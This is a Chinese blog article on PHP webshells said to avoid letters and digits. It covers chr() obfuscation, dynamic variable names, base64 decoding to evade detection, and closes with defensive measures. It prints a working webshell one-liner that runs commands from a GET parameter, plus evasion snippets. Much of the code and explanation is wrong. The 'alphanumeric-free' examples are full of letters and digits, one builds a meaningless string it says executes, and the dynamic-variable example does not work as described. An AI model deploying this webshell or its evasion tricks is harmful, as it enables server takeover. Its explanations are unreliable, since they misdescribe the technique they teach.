当前位置: 首页 > news >正文

无字母数字webshell的命令执行

在Web安全领域,WebShell是一种常见的攻击手段,通过它攻击者可以远程执行服务器上的命令,获取敏感信息或控制系统。而无字母数字WebShell则是其中一种特殊形式,通过避免使用字母和数字字符,来绕过某些安全机制的检测。

一、无字母数字WebShell的基本原理

无字母数字WebShell利用了PHP等脚本语言的灵活性,通过将字符转换函数(如 chr())、字符串连接符(如 .),或其他字符操作方法来构建出命令,进而避免直接使用字母和数字。

例如,通常的WebShell可能包含类似如下的代码:

<?php echo system($_GET['cmd']); ?>

而无字母数字WebShell则会通过一些字符操作,将上述代码进行转换。例如,可以通过 chr()函数将每个字母的ASCII值转换为字符:

<?php echo system(chr(99).chr(109).chr(100)); ?>

这段代码中,chr(99)表示字符 cchr(109)表示字符 mchr(100)表示字符 d,最终构成 cmd命令。

二、实现无字母数字WebShell
  1. 基础命令生成
    使用 chr()函数生成命令,如生成 "ls"命令:

    $cmd = chr(108) . chr(115); // 'l' = chr(108), 's' = chr(115)
    echo system($cmd);
  2. 字符拼接与执行
    PHP中可以通过字符串拼接和函数调用的方式避免使用字母:

    $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);
    $cmd = chr(108).chr(115); 
    $f($cmd);

    这段代码通过将字符的ASCII值转为字符,拼接得到 system和 ls命令,然后调用 system执行 ls

  3. 无字母执行Shell命令
    完整的无字母数字WebShell可以通过将这些技术组合来执行任意命令。例如:

    $a = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109);
    $b = chr(99).chr(104).chr(114);
    $c = chr(40).chr(41); // ()
    $cmd = $b.$c.chr(108).chr(115); // chr(99).chr(104).chr(114).chr(40).chr(41).'ls'
    $a($cmd);

    该代码拼接出命令 chr(ls),并利用 system函数执行。

三、规避检测的高级技巧
  1. 动态变量名
    通过动态生成的变量名进一步混淆WebShell:

    ${chr(102).chr(117).chr(110)} = 'system';
    ${chr(99).chr(104).chr(114)} = 'ls';
    ${${chr(102).chr(117).chr(110)}}(${${chr(99).chr(104).chr(114)}}());

    这种方法将变量名和函数名都通过 chr()生成,进一步规避静态检测。

  2. 编码与解码
    将命令编码为Base64等格式,并在执行前解码:

    $cmd = base64_decode('bHM='); // 'bHM=' is base64 for 'ls'
    system($cmd);

    通过Base64编码后再解码执行,增加了WebShell的隐蔽性。

四、防御措施

尽管无字母数字WebShell通过绕过传统字符的方式来执行命令,但仍有多种防御手段可以提高系统的安全性:

  1. 禁用危险函数:在PHP配置中禁用 systemexec等函数,防止命令执行。

    disable_functions = system, exec, shell_exec, passthru
    ​
    
  2. 使用WAF:部署Web应用防火墙(WAF),对请求进行深度检测和过滤,识别并阻断恶意Payload。

  3. 日志监控与分析:对Web服务器日志进行实时监控,检测异常请求或命令执行痕迹。

  4. 最小化权限:限制Web服务器用户的权限,确保即使WebShell被利用,攻击者也无法获得高权限执行命令。

五、总结

无字母数字WebShell是一种利用PHP等语言灵活特性的攻击手段,攻击者通过字符转换和编码技术绕过安全机制,执行恶意命令。然而,通过合理的防御措施,如禁用危险函数、使用WAF等,可以有效减少这种攻击带来的风险。在实践中,系统管理员应结合多种手段,提高服务器的安全性。

http://www.lqws.cn/news/114553.html

相关文章:

  • xcode 各版本真机调试包下载
  • ShardingSphere-JDBC 与 Sharding-JDBC 的对比与区别
  • JVM——类加载的流程与机制
  • 【HarmonyOS Next之旅】DevEco Studio使用指南(三十)
  • 【映射】2024-睿抗-AcWing 5834. 谁进线下了?
  • 从OSI到TCP/IP:网络协议的演变与作用
  • 鸿蒙任务项设置案例实战
  • EasyRTC嵌入式音视频通信SDK音视频功能驱动视频业务多场景应用
  • 计算机视觉处理----OpenCV(从摄像头采集视频、视频处理与视频录制)
  • 【android bluetooth 协议分析 14】【HFP详解 1】【案例一: 手机侧显示来电,但车机侧没有显示来电: 讲解AT+CLCC命令】
  • 【后端】RPC
  • Android 项目的核心配置文件
  • 在VSCode中开发一个uni-app项目
  • Linux RPC 和 NFS 教程
  • 湖北理元理律师事务所:债务化解中的心理重建与法律护航
  • 【Java算法】八大排序
  • Lifecycle 核心原理面试回答
  • 得物GO面试题及参考答案
  • NLP学习路线图(二十四):门控循环单元(GRU)
  • QT聊天项目DAY13
  • Tauri(2.5.1)+Leptos(0.7.8)开发桌面应用--简单的工作进度管理
  • 英福康INFICON VGC501, VGC502, VGC503 单通道、双通道和三通道测量装置
  • 【Harmony OS】数据存储
  • pytorch基本运算-导数和f-string
  • 【分布式技术】KeepAlived高可用架构科普
  • Vert.x学习笔记-EventLoop与Handler的关系
  • 电脑安装系统蓝屏的原因
  • 1. 引言
  • CSS(2)
  • AI 大模型+数字营销